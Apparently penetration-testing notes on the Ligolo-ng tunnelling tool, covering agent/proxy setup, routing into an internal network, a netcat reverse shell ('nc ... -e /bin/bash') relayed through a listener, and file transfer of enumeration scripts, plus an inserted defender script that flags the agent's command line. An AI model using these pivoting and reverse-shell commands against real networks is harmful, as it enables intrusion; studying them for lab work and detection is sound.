Ligolo-ng

https://github.com/nicocha30/ligolo-ng

Installation -

Using Kali Linux -

1. $ sudo ip tuntap add user [your_username] mode tun ligolo

2. $ sudo ip link set ligolo up

Grab the latest proxy and agent files from the link below -

  • make sure to download the files that match your target architecture

  • you can run "dpkg --print-architecture" in Linux to get the architecture

Running -

On attacker box

./proxy -selfcert

On target box

./agent.exe -connect <attacker ip>:11601 -ignore-cert

After that, we will receive the connection back on our attacker box. You can issue the help command to see the various functions the agent can perform.
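For defenders, the agent command line above is a practical detection point. The following is an added example (not part of the original notes or of the Ligolo-ng project) that scores process-creation events for the -connect / -ignore-cert flags and port 11601 shown on this page; the event format, host names and acceptance of the "--" and "=" flag forms are assumptions, and the sample events are constructed.

```python
import re

# Flags as they appear on this page: -connect <host>:<port> and -ignore-cert.
# Assumption: "--flag" and "-flag=value" spellings are also accepted.
CONNECT_RE = re.compile(r"(?<!\S)--?connect[=\s]+(\S+):(\d{1,5})(?!\S)", re.I)
IGNORE_CERT_RE = re.compile(r"(?<!\S)--?ignore-cert(?!\S)", re.I)
DEFAULT_PORT = 11601  # port used in the agent command on this page


def score_cmdline(cmdline):
    """Return (score, reasons) for one process command line."""
    reasons = []
    m = CONNECT_RE.search(cmdline)
    if m:
        reasons.append(f"-connect to {m.group(1)}:{m.group(2)}")
        if int(m.group(2)) == DEFAULT_PORT:
            reasons.append("port 11601 as used by the agent command")
    if IGNORE_CERT_RE.search(cmdline):
        reasons.append("-ignore-cert (certificate verification disabled)")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return events whose command line matches at least `threshold` indicators."""
    hits = []
    for ev in events:
        score, reasons = score_cmdline(ev["cmdline"])
        if score >= threshold:
            hits.append({"host": ev["host"], "pid": ev["pid"],
                         "score": score, "reasons": reasons})
    return hits


# Constructed sample process-creation events (hypothetical hosts, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-014", "pid": 4312,
     "cmdline": r"C:\Users\Public\agent.exe -connect 203.0.113.7:11601 -ignore-cert"},
    {"host": "WS-014", "pid": 4400,
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    # Renamed binary on a non-default port: still flagged by the flag pair.
    {"host": "SRV-02", "pid": 911,
     "cmdline": "/tmp/upd -connect 198.51.100.9:443 -ignore-cert"},
    # Benign tool that also has a -connect flag: one indicator only, not flagged.
    {"host": "SRV-03", "pid": 120,
     "cmdline": "/usr/bin/openssl s_client -connect example.org:443"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Requiring two indicators keeps tools like openssl s_client, which share the -connect flag, out of the results while still catching a renamed agent binary.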

Routing table -

On attacker box -

#  ligolo terminal

$ session                     - select the session you want to interact with

$ ifconfig                    - list all the available networks on the target box




# bash terminal

$ sudo ip route add 10.10.120.0/24 dev ligolo

$ ip route list                 - confirm that the route was added

After that, you can start a tunnel and interact with the internal network.

In the ligolo terminal -

$ session                      - list all the connected agents

$ start                        - select session and start tunnel

After this setup, you can start scanning the internal network.

Obtaining reverse shell of the internal host

What if we need to catch a reverse shell coming from an internal host? We cannot catch the shell directly, because the internal network cannot reach our attacker box, so we use the ligolo agent box to forward the shell back to us.

Let's assume we are going to execute some type of RCE on the internal box.

# Internal target box -

- Let's say we are crafting a payload; in that payload we need to put the ligolo agent box IP address and port number.

$ nc 10.10.169.23 4444 -e /bin/bash             - here the IP address should be the ligolo agent box IP




# ligolo terminal -

Now we add a listener to forward the traffic to our box:

$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:1234

$ nc -lvp 1234                   - run this in a bash terminal on the attacker box; the shell arrives on port 1234

File Transfer -

Let's say we need to transfer scripts such as linpeas and winpeas to internal boxes.

# ligolo terminal -

- We can add another listener to forward the traffic back to our attacker box:

$ listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000

- Now, on the internal box, we can browse to port 7777 on the ligolo agent box IP, and the traffic is redirected back to the attacker box.

- Then we start our Python server on the attacker box on port 8000:

$ python -m http.server
